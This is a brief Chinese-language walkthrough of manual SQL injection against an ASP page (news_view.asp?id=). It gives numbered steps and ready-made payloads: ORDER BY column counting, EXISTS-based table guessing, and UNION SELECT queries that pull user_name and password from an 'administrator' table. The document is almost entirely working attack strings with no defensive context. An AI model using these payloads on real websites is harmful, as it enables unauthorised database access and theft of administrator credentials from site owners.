1.判断网站有无注入点
2.用order by判断列数
3.判断表名
news_view.asp?id=11 and exists(select * from 表名)
4.判断回显位置
news_view.asp?id=11 union select 1,2,3,4,5,6,7 from administrator
5.判断字段
news_view.asp?id=14 union select 1,user_name,3,4,5,6,7 from administrator
news_view.asp?id=14 union select 1,user_name,password,4,5,6,7 from administ
rator